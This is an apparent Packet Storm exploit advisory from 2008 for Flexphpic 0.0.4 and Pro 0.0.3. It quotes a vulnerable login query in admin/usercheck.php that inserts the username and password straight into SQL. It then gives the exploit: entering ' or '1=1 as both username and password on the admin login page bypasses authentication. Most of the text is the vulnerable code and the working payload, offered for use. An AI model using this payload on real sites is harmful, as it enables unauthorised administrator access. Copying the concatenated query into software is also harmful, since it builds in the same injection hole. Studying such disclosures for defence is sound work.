Flexphpic 0.0.x SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73484
Type packetstorm
Reporter S.W.A.T.
Modified 2008-12-31T00:00:00

Description

                                        
                                            `#############################################  
Autore: S.W.A.T.  
Email: svvateam@yahoo.com  
Site: Www.BaTLaGH.coM  
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3  
Download: http://www.china-on-site.com/flexphpic/downloads.php  
##############################################  
Bug In \admin\usercheck.php  
$sql = "select username,adminid from linkexadmin where  
username='$checkuser' and password='$checkpass'";  
Exploit:  
  
Go to /[path]/admin/index.php  
Put as username and password the following sql code: ' or '1=1  
  
I'll Be A C I D A L !!!  
  
  
`